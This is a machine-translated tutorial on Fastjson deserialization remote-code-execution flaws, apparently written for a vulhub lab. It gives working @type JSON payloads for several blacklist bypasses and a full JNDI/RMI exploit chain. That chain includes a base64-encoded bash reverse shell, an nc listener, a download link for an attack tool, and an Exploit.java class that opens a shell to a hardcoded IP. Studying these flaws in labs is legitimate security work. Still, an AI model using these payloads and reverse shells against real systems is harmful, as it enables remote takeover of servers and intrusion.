Fastjson brief introduction

Fastjson It's an open source product of Alibaba JSON Parser , It can parse JSON Format string , Support will Java
Bean Serialize to JSON character string , You can also get it from JSON Deserialize string to Java Bean .

Historical loopholes

Fastjson <=1.2.24  Deserialization remote command execution vulnerability 
Fastjson <=1.2.41  Deserialization remote command execution vulnerability 
Fastjson <=1.2.42  Deserialization remote command execution vulnerability 
Fastjson <=1.2.43  Deserialization remote command execution vulnerability 
Fastjson <=1.2.45  Deserialization remote command execution vulnerability 
Fastjson <=1.2.47  Deserialization remote command execution vulnerability 
Fastjson <=1.2.62  Deserialization remote command execution vulnerability 
Fastjson <=1.2.66  Deserialization remote command execution vulnerability 

Fastjson < 1.2.41

first Fastjson After the deserialization vulnerability is exposed , Ali in 1.2.25 Version set autoTypeSupport Property defaults to false, and
And added checkAutoType() function , Defense through a black-and-white list Fastjson Deserialization vulnerability , So what we found later
Fastjson Deserialization vulnerabilities are all aimed at bypassing the blacklist to achieve the purpose of attack and utilization .
com.sun.rowset.jdbcRowSetlmpl stay 1.2.25 Version has been blacklisted ,fastjson There is a judgment condition to judge that the class name is
No with "L" start 、 With ";" ending , If yes, extract the class name and load it
Then it can be constructed as follows exp：
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;", "dataSourceName":"rmi://ip:9999/rce_1_2_24_exploit", "autoCommit":true}

Fastjson < 1.2.42

Ali found this bypass vulnerability and made the class name if L start ,; At the end, remove L and ; The party conducting blacklist inspection
Law , But the situation of double writing or multiple writing is not considered , In other words, this method can only defend one group L and ;, structure exp as follows , That is, double writing L
and ;
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;", "dataSourceName":"rmi://x.x.x.x:9999/exp", "autoCommit":true}

Fastjson < 1.2.47

stay 1.2.47 Version and below ,loadClass The default cache by true, use first java.lang.Class Take what you get
Class is cached to mapping in , Then get it directly from the cache com.sun.rowset.jdbcRowSetlmpl This class , Just go around
Go through the blacklist .
{ "a": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://ip:9999/exp", "autoCommit": true }}

Fastjson < 1.2.66

Bypass based on blacklist , autoTypeSupport The attribute is true Can be used , stay 1.2.25 After the version autoTypeSupport Default
by false
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://ip:1389/Calc"} {"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://ip:1389/Calc"} {"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://ip:1389/Calc"}

Fastjson distinguish

Fastjson Is used for JSON Format data for parsing and packaging , So appear json Where the format is possible Fastjson.
adopt burpsuite Capture packets to view the data package Content-Type Is it application/json. You can further use the error reporting method to determine whether it is fastjson.

Fastjson Error identification ：

Use burpsuite Grab the bag => send out Repeater=> Right click on the request header to select "Change request method"（ change http request ）=> take Content-type The property of the is changed to application/json => add to json Format .
You can see that when the format is correct , Output the content .
If we construct the wrong json How about the format ？
It will explode json Information .

You can also construct the following json when json edition .

[
{
  "a":"a\x] {"@type":"java.lang.AutoCloseable"a

Fastjson Vulnerability discovery

principle ： java.net.InetAddress This class will try to instantiate example.com Domain name resolution , At this time, you can go through dnslog To know whether the vulnerability exists .

You can see DNS Resolve the domain name , Can be judged fastjson The existence of loopholes .

Fastjson1.2.47 Deserialization vulnerability (CNVD‐2019‐22238)

Vulnerability profile

fastjson In parsing json In the process of , Support use autoType To instantiate a concrete class , And call the
set/get Method to access properties . By looking up the relevant methods in the code , Can construct a number of malicious use chain .
fastjson On 1.2.24 The deserialization whitelist has been added after version , And in the 1.2.48 In previous versions , Attackers can take advantage of special
Specially constructed json String bypasses whitelist detection , Successful execution of any command .

Affects version

fastjson<1.2.48

JNDI

JNDI（The Java Naming and Directory Interface,Java Naming and Directory Interface ） It's a group in Java Access naming in application
And directory services API, Naming services associate names with objects , So that we can access objects by name .
You can access the following named / A directory service :
RMI (JAVA Remote method call )
LDAP ( Lightweight directory access protocol )
CORBA ( Common Object Request Broker Architecture )
DNS ( Domain name service )

JNDI Inject + RMI

RMI yes Java Remote method call , yes Java In programming languages , An application programming interface for remote procedure call .
It enables programs running on the client to call objects on the remote server .

Loophole recurrence

1. docker Build a shooting range environment

cd vulhub--master
ls
cd fastjson/
ls
cd 1.2.47-rce/
docker-compose up -d
docker ps

2. Use the browser to access the range address .(http://ip:port)
   

Method 1 ：JNDI Inject + RMI

1. Download and use tools on the attacker .

 https://toolaffix.oss-cn-beijing.aliyuncs.com/jndi_tool.jar

3. rebound shell
   take bash -i >& /dev/tcp/ attack ip/6666 0>&1 Conduct base64 code .
   stay burpsuite Medium Decoder Module coding .
   

1.bash -i >& /dev/tcp/ attack ip/6666 0>&1
2.bash -c {echo,bash -i >& /dev/tcp/ attack -ip/6666 0>&1 Of base64 code }|
{base64,-d}|{bash,-i}
3.java -cp fastjson_tool.jar fastjson.HRMIServer 171.16.1.105 9999 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzEuMTYuMS4xMDUvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}"

2. Use the tool to start RMI server

java -cp fastjson_tool.jar fastjson.HRMIServer 124.71.45.28 9999 " Commands to execute "

4. Open a new window to listen on the port .

nc -lnvp 6666

5. structure payload The attack , utilize JNDI Injection loading remote RMI server Bytecode on （ Fixed format ）

{
   "a":{
       "@type":"java.lang.Class",
       "val":"com.sun.rowset.JdbcRowSetImpl"
   },
   "b":{
       "@type":"com.sun.rowset.JdbcRowSetImpl",
       "dataSourceName":"rmi:// attack ip:9999/Object",
       "autoCommit":true
   }
}

6. Click on send, Return to the listening and viewing results .
   

7. Rebound success ！

Method 2 ：

1.Exploit.java

//javac Exploit.java
import java.lang.Runtime;
import java.lang.Process;
public class Exploit {
   public Exploit(){
       try{
           Runtime.getRuntime().exec("/bin/bash -c [email protected]|bash 0 echo bash -i >& 
/dev/tcp/47.101.214.85/6666 0>&1");
       }catch(Exception e){
           e.printStackTrace();
       }
   }
   public static void main(String[] argv){
       Exploit e = new Exploit();
   }
}

2. javac Exploit.java. Before the order, the directory will generate a Exploit.class Bytecode file
3. With the help of marshalsec Start a project rmi The server , Listening on a port , And specify to load the remote class Exploit.class .
   maven Package project jar package ：mvn clean package -DskipTests
4. Turn on http service .

python3 -m http.server

6. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://171.16.1.105:8000/#Exploit” 9999
   

7. Turn on port monitoring .

8. structure payload The attack .

9. Click on send, Return to the listening and viewing results .